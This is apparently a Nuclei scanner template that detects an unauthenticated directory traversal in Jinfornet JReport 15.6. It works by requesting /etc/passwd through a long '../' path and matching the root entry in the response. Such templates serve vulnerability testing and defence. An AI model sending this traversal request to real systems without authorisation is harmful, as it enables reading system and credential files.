id: jinfornet-jreport-lfi
info:
  name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
  author: 0x_Akoko
  severity: high
  reference: https://cxsecurity.com/issue/WLB-2020030151
  tags: jreport,jinfornet,lfi
requests:
  - method: GET
    path:
      - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
      - type: status
        status:
          - 200
